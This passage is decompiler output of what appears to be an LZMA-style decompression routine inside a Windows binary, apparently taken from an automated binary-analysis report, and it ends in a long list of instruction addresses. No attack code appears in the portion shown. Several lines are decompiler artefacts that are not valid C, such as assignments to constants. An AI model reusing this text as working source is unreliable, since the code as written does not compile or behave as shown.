							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406f4a
0x00406f4a
0x00406f4e
0x00407005
0x00407008
0x00407014
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00000000
0x004072bb
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x00000000
0x004072dd
0x00406f54
0x00406f58
0x00407499
0x00407499
0x0040749c
0x004074a0
0x004074a0
0x00406f5e
0x00406f64
0x00406f67
0x00406f6b
0x00406f6e
0x00406f72
0x00407438
0x00407484
0x0040748c
0x00407493
0x00407495
0x00000000
0x00407495
0x00406f78
0x00406f7b
0x00406f81
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00406fac
0x00406fac
0x00406fac
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
